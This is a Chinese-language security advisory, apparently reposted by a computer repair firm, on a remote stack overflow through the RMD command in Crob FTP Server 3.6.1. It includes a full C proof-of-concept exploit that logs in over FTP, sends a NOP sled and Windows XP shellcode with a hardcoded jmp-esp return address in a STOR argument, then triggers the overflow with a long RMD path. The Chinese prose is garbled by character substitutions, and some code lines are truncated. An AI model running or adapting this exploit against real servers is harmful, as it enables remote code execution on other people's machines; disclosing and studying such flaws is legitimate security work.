Crob FTP Server远程RMD命令栈溢出漏洞
受影响体系:
Crob Crob FTP Server 3.6.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13847
Crob Ftp Server是一款简单易用的FTP办事步伐。
Crob FTP Server在处理客户端恳求时存在缓冲区溢露马脚。
如果攻击者能够向任意FTP命令(例如STOR)提供超长参数然后以很长的参数调用RMD命令的话,就可以触发栈溢出。成功使用这个漏洞的攻击者可在办事器上以实行代码。
<*泉源:Leon Juranic (ljuranic@LSS.hr)
链接:http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-06
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下步伐(方法)大概带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* CrobFTP remote stack overflow PoC
* ---------------------------------
* Tested on Crob FTP Server 3.6.1, Windows XP
*
* Coded by Leon Juranic
* LSS Security / http://security.lss.hr
*
*/
#include
#include
#include
#pragma comment (lib,"ws2_32")
char *fzz_recv (int sock)
{
fd_set fds;
struct timeval tv;
static char buf[10000];
char *ptr=buf;
int n;
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock,&fds);
if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
buf[n-1] = '\0';
printf ("RECV: %s\n",buf);
return buf;
}
else {
return NULL;
}
}
int login (int sock, char *user, char *pass)
{
char buf[1024], *bla;
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
sprintf (buf,"USER %s\r\n",user);
send (sock,buf,strlen(buf),0);
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
sprintf (buf,"PASS %s\r\n",pass);
send (sock,buf,strlen(buf),0);
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
if (strcmp("230",bla) != NULL)
return 0;
else return -1;
return 0;
}
void lame_sploit (char *pack, char *user, char *pass)
{
WORD wVersionRequested;
WSADATA wsaData;
int sock, err,x;
struct sockaddr_in sin;
char buf[2000],tmp[1000];
char *shell= // 5 min. XP SP1 shellcode
"\x33\xc0" // xor eax,eax
"\x50" // push eax (\0)
"\x68\x2e\x65\x78\x65" // push '.exe'
"\x68\x63\x61\x6c\x63" // push 'calc'
"\x54" // push esp
"\xba\x44\x80\xc2\x77" // mov edx, 77c28044
"\xff\xd2"; // call edx (system)
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("ERROR: Sorry, cannot create socket!!!\n");
ExitProcess(-1);
}
sock=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);
sin.sin_port = htons(21);
if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
printf ("CONNECT :(((\n");
ExitProcess(-1);
}
if (login(sock,user,pass) == -1)
{
printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
exit(-1);
}
memset(tmp,0,sizeof(tmp));
memset (tmp,0x90,180);
memcpy (&tmp[80],shell,strlen(shell));
*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
*(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74
*(long*)&tmp[170] = 0x9090e4ff; // jmp esp
_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);
printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
send (sock,buf,strlen(buf),0);
printf ("%s\n",fzz_recv(sock));
strcpy(buf,"RMD ");
for (x=0;x<276;x++)
strcat (buf,".../");
strcat(buf,"\r\n");
printf ("Sending exploit strings\n");
send (sock,buf,strlen(buf),0);
printf ("recv: %s\n",fzz_recv(sock));
}
main (int argc, char **argv)
{
printf ("CrobFTP Stack overflow PoC \n"
"Coded by Leon Juranic
"LSS Security / http://security.lss.hr/\n");
if (argc < 4 ) {
printf ("\nusage: %s
exit(-1);
}
lame_sploit(argv[1],argv[2],argv[3]);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Crob
----
现在厂商还没有提供补丁大概晋级步伐,我们建议使用此软件的用户随时存眷厂商的主页以获取最新版本:
http://www.crob.net/studio/ftpserver/
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
